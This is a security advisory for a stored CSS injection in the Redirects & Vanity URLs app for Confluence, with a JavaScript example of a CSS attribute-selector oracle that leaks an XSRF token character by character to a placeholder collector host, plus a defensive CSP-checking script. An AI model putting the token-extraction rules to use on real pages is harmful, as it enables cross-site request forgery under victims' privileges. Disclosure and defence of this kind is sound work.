
2026-01-19 Stored CSS Injection allowing for XSRF token Extraction

Summary

Stored CSS Injection allowing for XSRF token Extraction in Redirects & Vanity URLs app

Advisory Release Date

2026-01-19

Products

Redirects & Vanity URLs for Confluence

Affected Versions

3.0.0 - 3.1.2

Fixed Version

3.1.3

CVSS Score

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N/E:P/RL:O/RC:C (base 7.3 High, temporal 6.6 Medium)

Summary

This advisory discloses a high severity security vulnerability affecting Redirects & Vanity URLs for Confluence versions 3.0.0 to 3.1.2.

Please upgrade your installation of the app to version 3.1.3 or later to fix this vulnerability.

Details

The Redirects & Vanity URLs app does not properly sanitize certain user-controlled input when rendering it in the app's management UI. Under specific circumstances, this allows an attacker to inject arbitrary CSS into that UI. Injected styles can be used to deface the page or to exfiltrate page content, including the XSRF token that protects the victim against cross-site request forgery.

For a successful CSS injection attack, the following requirements must be met:

  • The attacker must have the ability to create or edit Confluence pages and prepare one for the exploit

  • The victim must

    • have a Confluence account

    • have the ability to view the Confluence page and

    • be allowed to open the management UI of the App by being

      • in the link modification user group or

      • a Confluence Administrator or

      • a System Administrator

  • The victim must either

    • visit a link prepared by the attacker or

    • organically visit the app’s management UI from the prepared page’s action menu

For the full impact of the attack to be realized (actions performed with the victim's privileges):

  • The attacker must then use the extracted token in a successful XSRF attack against the victim
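The mechanism behind "exfiltrating page content including the XSRF token" is a CSS attribute-selector oracle: one rule per candidate character, where only the rule whose `value^=` prefix matches the real token triggers a resource fetch to an attacker-observed host. The block below is an added example, not code from the advisory or the app vendor, and it does not reproduce the app-specific injection point. It assumes the token sits in an element such as `<input name="atl_token" value="...">` (the field name `atl_token` is an assumption), that the attacker controls a `<style>` block on the victim's page, and it simulates the browser's rule matching offline so the whole loop runs without a network.

```javascript
// Added example (not from the advisory or the app vendor): a CSS attribute-selector
// oracle that leaks a token one character per round, simulated offline.
// Assumptions: the token sits in an element such as <input name="atl_token" value="...">
// (atl_token is assumed to be the XSRF field name), the attacker controls a <style>
// block on the victim's page, and each matching rule makes the browser fetch a URL
// on an attacker-observed host. The app-specific injection point is not reproduced.

const ALPHABET = 'abcdefghijklmnopqrstuvwxyz0123456789';

// One round of injected CSS: one rule per candidate next character. Only the rule
// whose prefix matches the real value fires, so the fetched URL names the character.
function buildRules(knownPrefix, alphabet, collector) {
  return alphabet
    .split('')
    .map((ch) => {
      const guess = knownPrefix + ch;
      return `input[name="atl_token"][value^="${guess}"]{background:url(${collector}/leak?p=${encodeURIComponent(guess)})}`;
    })
    .join('\n');
}

// Stand-in for the browser: apply the prefix rules to a page whose token is
// tokenValue and return the URLs that would be requested. It parses only the
// rule shape buildRules emits, not general CSS.
function simulateBrowser(css, tokenValue) {
  const rule = /\[value\^="([^"]*)"\]\{background:url\(([^)]*)\)\}/g;
  const fetched = [];
  for (const m of css.matchAll(rule)) {
    if (tokenValue.startsWith(m[1])) fetched.push(m[2]);
  }
  return fetched;
}

// Attacker side: extend the known prefix from each leaked request until no rule
// fires, which means the whole token has been recovered (or a character outside
// the alphabet was reached, in which case only the prefix is returned).
function extractToken(tokenValue, alphabet = ALPHABET, collector = 'https://collector.example') {
  let known = '';
  let rounds = 0;
  for (;;) {
    rounds += 1;
    const hits = simulateBrowser(buildRules(known, alphabet, collector), tokenValue);
    if (hits.length === 0) break;                    // no candidate matched: done
    known = new URL(hits[0]).searchParams.get('p');  // searchParams decodes the prefix
  }
  return { token: known, rounds, requestsPerRound: alphabet.length };
}

// Demo run against a constructed token value
const demo = extractToken('a1b2c3');
console.log(`recovered ${demo.token} in ${demo.rounds} rounds of ${demo.requestsPerRound} rules each`);
```

Each round costs one rule per alphabet character and needs a fresh injection (or a chained `@import`) carrying the prefix learned so far, which is why the requirement list above speaks of a prepared page and a victim who opens the management UI. Tokens stored in non-rendered elements such as `<meta>` or hidden inputs first have to be forced to render (for example `head, meta { display: block }`) before their attributes can drive a background fetch.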

What You Need to Do

Upgrade the Redirects & Vanity URLs app to version 3.1.3 or later.

As a workaround, you can add a rule in your load balancer or reverse proxy that tightens Confluence's built-in Content-Security-Policy header so that style-src allows only Confluence's own origin ('self'). This may break Confluence or other apps, and it only prevents extraction of page content such as the XSRF token; it does not prevent defacing of the page. Upgrading is strongly recommended.
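Before deploying such a proxy rule it is worth checking what the resulting header actually permits, because the fetch an injected stylesheet uses to leak data is governed by different directives depending on the CSS feature: `@import` falls under style-src, `background: url()` under img-src, and `@font-face src: url()` under font-src, each falling back to default-src when absent. The checker below is an added example, not the vendor's code, and the header strings in it are constructed for illustration rather than Confluence's real policy.

```javascript
// Added example (not the vendor's code; header values are constructed, not
// Confluence's real policy): evaluate a Content-Security-Policy header the way a
// browser does for the channels injected CSS can use to leak page content.

const CHANNELS = {
  // CSS feature an injected stylesheet would use -> directive governing the fetch
  '@import': 'style-src',
  'background:url()': 'img-src',
  '@font-face src:url()': 'font-src',
};

function parseCsp(header) {
  const policy = new Map();
  for (const part of header.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const name = tokens[0].toLowerCase();
    // Browsers ignore a repeated directive; the first occurrence wins.
    if (!policy.has(name)) policy.set(name, tokens.slice(1).map((t) => t.toLowerCase()));
  }
  return policy;
}

// Fetch directives fall back to default-src when absent; neither present means unrestricted.
function sourceList(policy, directive) {
  return policy.get(directive) ?? policy.get('default-src') ?? null;
}

// Can a resource on an origin other than the page's be fetched under this source list?
function allowsForeignOrigin(sources, pageOrigin) {
  if (sources === null) return true;
  const origin = pageOrigin.toLowerCase();
  return sources.some((s) => {
    if (s === '*' || s === 'http:' || s === 'https:') return true;
    if (s.startsWith("'") || s.endsWith(':')) return false; // keywords, nonces/hashes, other schemes such as data:
    return s !== origin;                                    // any other host expression
  });
}

// Inline <style> blocks need 'unsafe-inline', which a nonce or hash in the same list disables.
function allowsInlineStyle(sources) {
  if (sources === null) return true;
  const hasNonceOrHash = sources.some((s) => /^'(nonce|sha256|sha384|sha512)-/.test(s));
  return sources.includes("'unsafe-inline'") && !hasNonceOrHash;
}

// Report whether an injected inline <style> block would apply at all, and which
// leak channels could reach a foreign origin under the given header.
function assessCssExfil(header, pageOrigin) {
  const policy = parseCsp(header);
  const report = { inlineStyle: allowsInlineStyle(sourceList(policy, 'style-src')), openChannels: [] };
  for (const [feature, directive] of Object.entries(CHANNELS)) {
    if (allowsForeignOrigin(sourceList(policy, directive), pageOrigin)) report.openChannels.push(feature);
  }
  return report;
}

// Constructed before/after headers for a hypothetical proxy rule
const weak = "default-src 'self'; style-src 'self' 'unsafe-inline'; img-src *";
const tightened = "default-src 'self'; style-src 'self'";
console.log('weak:', assessCssExfil(weak, 'https://confluence.example'));
console.log('tightened:', assessCssExfil(tightened, 'https://confluence.example'));
```

Run the checker against the header your proxy actually emits (for example copied from a `curl -I` of the Confluence login page) and the origin users reach Confluence on. An empty `openChannels` list together with `inlineStyle: false` means neither a leak fetch nor a freshly injected inline stylesheet is permitted; a rule that restricts only style-src while img-src stays at `*` still leaves the `background:url()` channel open.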

Support

If you have questions or concerns regarding this advisory, please raise a support request via our Support Portal.